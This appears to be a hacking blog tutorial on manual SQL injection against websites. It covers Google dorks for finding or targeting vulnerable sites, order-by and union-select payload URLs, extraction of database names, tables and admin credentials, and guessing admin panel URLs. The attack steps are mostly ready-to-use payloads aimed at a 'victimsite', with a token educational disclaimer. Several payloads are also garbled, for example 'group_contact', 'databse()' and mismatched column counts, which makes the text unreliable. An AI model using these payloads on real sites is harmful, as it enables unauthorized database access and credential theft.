Website Hacking |
What is SQL injection ?
SQL injection is one of the popular web application hacking method. Using the SQL injection attack, an unauthorized person can access the database of the website.Attackers can extract the data from database.What a hacker can do with SQL injection attack?
- Bypassing Logins
- Accessing secret data
- Modifying contents of website
- Shutting down the My SQL Server
Lets go ....
Step 1: Finding the Vulnerable Website:
To find SQL injection vulnerable site, you can use google search by searching for certain keywords. Those keyword often referred as 'Google dork'.
Some Examples//
inurl:index.php?id=
inurl:gallery.php?ide=
inurl:pageid=
inurl:article.php?id=
Copy one of the above code and paste in google. Here, we will got lot search result. We have to visit the website one by one for checking the vulnerability.
Note: if you like to hack particular website, then try this:
site: www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the vulnerabilities
Now, lets check the vulnerabilitiesof the target website. To check the vulnerability, add the single quotes(') at the end of the url and hit enter.
For eg//
http://www.victimsite.com/index.php?id=2'
If the page remains in the same page or showing that page not found, then it is not vulnerable.
If you got an error message just like this, then it means that the site is vulnerable.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to user near '\' at line 1
Step 3: Finding number of columns:
Great we have found the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,5,.......n. Until you get the error like "unknown column".
For eg//
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
If you get the error while tryimg the "x"th number, then the number of column is "x-1".
I mean,
http://www.victimsite.com/index.php?id=2 order by 1(no error)
http://www.victimsite.com/index.php?id=2 order by 2(no error)
http://www.victimsite.com/index.php?id=2 order by 3(no error)
http://www.victimsite.com/index.php?id=2 order by 4(no error)
http://www.victimsite.com/index.php?id=2 order by 5(no error)
http://www.victimsite.com/index.php?id=2 order by 6(no error)
http://www.victimsite.com/index.php?id=2 order by 7(no error)
http://www.victimsite.com/index.php?id=2 order by 8(error)
So now x=8. the number of column is x-1 i.e. 7
In case, if the above methods fails to work for you, then try to add the "--" at the end of the statement.
For eg//
http://www.victimsite.com/index.php?id=2 order by 1--
Step 4:Find the vulnerable columns:
We have successfully discovered the number of columns present in the target database.Let us fiind the vulnerable column by trying the query "union_select columns_sequence".
Changing the id value to negative (i.e. id=-2). Replace the column sequence with the number of 1 to x-1(number of columns)seperated by commas(,).
For eg//
if the number of column is 5, then the query is as follow
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column
Bingo,column "3" and "7" are found as vulnerable . Let us thake the first vulnerable column '3'.We can inject our query in this column.
Step 5: Finding version,database,user
Replace the 3 from the query with "version()"
For eg//
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, it will display the version as 5.0.1 or 4.33. Something like this.
Replace the version() with database() ans user() for finding the database,user respectively.
For eg//
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,databse(),4,5,6,7--
http://www.victiimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working then try this
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 6: Finding the table name:
If the database version is 5 or above. If the version is 4.x, then you have to guess the tables names(blind SQL injection attacks)
Let us find the table nameof the database. Replace the 3 with"group_contact(table_name) and add the "from information_schema.tables where table_schema=databse()"
For eg//
http://www,victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_contact(table_name),4,5,6,7 from informatio_svhema.tables where table_schema=database()--
Now it will display the list of table names which is related with the admin and the user.
Let us choose the admin table.
Step 7: Finding the Column name
Now replace the "group_contact(table_name)"with the "group_contact(column_name)".
Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar-- ".
We have to convert the table name to MySQL CHAR() string.
Install the HackBar Addon:
Once you installed the addon , you can see a toolbar that will like the following one.If you are not able to see the HackBar, Then press F9.
Select sql->Mysql->MysqlChar() in the HackBar.
It will ask you t enter string you want to convert to MYSQLCHAR().We want to convert the table name to MysqlCHAR. In our case the table name is 'admin'.
Now you can see the CHAR(number seperated by Commas) in the Hack toolbar.
Copy and paste the code at the end of the url instead of the "mysqlchar".
For eg//
http://www.victimsite.com/iindex.php?id=-2 and 1=2 union select 1,2,group_contact(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--
The above query will display the list of columns.
For eg//
admin,password,admin_id,admin_name,admin_password,active,admin_name,admin_pass,admin_password,ID_admin,admin_username,username,password,etc..
Now replace the replace group_contact(column_name) with group_contact(columnname1,0x3a,anothercolumnname2).
Now replace the "from information_schema.columns where table_name=CHAR(97,100,109,105,110)" with the "from table_name"
For eg//
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_contact(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query display the "column is not found" error, then try another column name from the list.
If we got luck, it will display the data stored in the database depending on your column name. For instance, username and password column will display the login credentials stored in the database.
Step 8: Finding the Admin panel:
Just try the URL like
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc..
If you got lick you will find the admin page using above URL's or you can use some kind of admin finder tools.
Imp Note:This tutorial is for educational purpose only. I will not responsible for any harm or damage. Do it at your own risk.
.